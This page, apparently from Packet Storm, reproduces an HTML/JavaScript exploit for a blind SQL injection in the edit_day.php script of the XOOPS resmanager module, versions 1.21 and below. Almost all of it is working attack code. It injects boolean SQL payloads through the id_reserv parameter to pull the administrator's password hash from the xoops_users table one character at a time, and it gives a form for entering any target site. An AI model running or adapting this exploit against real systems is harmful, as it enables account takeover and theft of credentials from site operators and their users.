XOOPS Module resmanager versions 1.21 and below blind SQL injection exploit.
3a391bb1a2bef7908d21b3e881bc670153b38fde0581fea0ee7ca25b4a3c895a<html>
<head>
<title>XOOPS Module resmanager <= 1.21 (edit_day.php) BLIND SQL Injection Exploit</title>
<script type="text/javascript">
//'===============================================================================================
//'[Script Name: XOOPS Module resmanager <= 1.21 (edit_day.php) BLIND SQL Injection Exploit
//'[Coded by : ajann
//'[Author : ajann
//'[Contact : :(
//'[S.Page : http://www.xoops.org/modules/repository/singlefile.php?cid=102&lid=1398
//'[$$ : Free
//'[Using : Write Target after Submit Click
//'===============================================================================================
function nesneyarat() {
var nesne;
var tarayici = navigator.appName;
if(tarayici == "Microsoft Internet Explorer"){
nesne = new ActiveXObject("Microsoft.XMLHTTP");
}
else {
nesne = new XMLHttpRequest();
}
return nesne;
}
var http = nesneyarat();
function islemlink(adresyolla,charyolla) {
genreidim=document.getElementById('genreid').value
file="/modules/resmanager/edit_day.php?id_reserv=" + genreidim
pathim=document.getElementById('path').value + file
karakterim=document.getElementById('karakter').value + charyolla
adres=document.getElementById('adresim').value + pathim + adresyolla + karakterim
http.open('get', adres);
http.onreadystatechange = cevapFonksiyonu;
http.send(null);
}
function cevapFonksiyonu() {
if(http.readyState == 4){
document.getElementById('mesaj').value = http.responseText;
yonlendir();
}
}
function yonlendir() {
if (document.getElementById('mesaj').value.indexOf('Booking calendar', 0) == -1) {
alert('False');
}
if (document.getElementById('mesaj').value.indexOf('Booking calendar', 0) != -1) {
alert('TRUEEEEEEE');
}
}
function dal() {
if (document.getElementById('buton').value == "Test Character(0)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(1)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=49)/*');
document.getElementById('buton').value = "Test Character(2)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(2)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=50)/*');
document.getElementById('buton').value = "Test Character(3)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(3)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=51)/*');
document.getElementById('buton').value = "Test Character(4)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(4)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=52)/*');
document.getElementById('buton').value = "Test Character(5)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(5)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=53)/*');
document.getElementById('buton').value = "Test Character(6)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(6)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=54)/*');
document.getElementById('buton').value = "Test Character(7)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(7)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=55)/*');
document.getElementById('buton').value = "Test Character(8)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(8)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=56)/*');
document.getElementById('buton').value = "Test Character(9)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(9)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=57)/*');
document.getElementById('buton').value = "Test Character(a)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(a)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=97)/*');
document.getElementById('buton').value = "Test Character(b)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(b)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=98)/*');
document.getElementById('buton').value = "Test Character(c)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(c)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=99)/*');
document.getElementById('buton').value = "Test Character(d)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(d)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=100)/*');
document.getElementById('buton').value = "Test Character(e)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(e)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=101)/*');
document.getElementById('buton').value = "Test Character(f)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(f)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=102)/*');
document.getElementById('buton').value = "Finished"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
}
</script>
</head>
<body bgcolor="#000000">
<center>
<p><b><font face="Verdana" size="2" color="#008000">XOOPS Module resmanager <= 1.21 (edit_day.php) BLIND SQL Injection Exploit</font></b></p>
<p></p>
<b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/</font><font color="#00FF00" size="2" face="Arial">
</font><font color="#FF0000" size="2"> </font></b>
<input type="text" name="adresim" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="http://"></p>
<br>
<b><font face="Arial" size="1" color="#FF0000"> Path:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath] </font></b>
<input type="text" name="path" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="/">
<p>
<b><font face="Arial" size="1" color="#FF0000"> Character:</font><font face="Arial" size="1" color="#808080">[Md5
Character 1-32] </font></b>
<input type="text" name="karakter" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
<p>
<b><font face="Arial" size="1" color="#FF0000">Article Id:</font><font face="Arial" size="1" color="#808080">[print.php?articleid=] </font></b>
<input type="text" name="genreid" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
<p><input type="submit" value="Test Character(0)" name="buton" onclick="dal();"></p>
<br>
<textarea name="mesaj" rows="1" cols="20" style="visibility:hidden"></textarea> <br>
<p>
<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</p>
</center>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed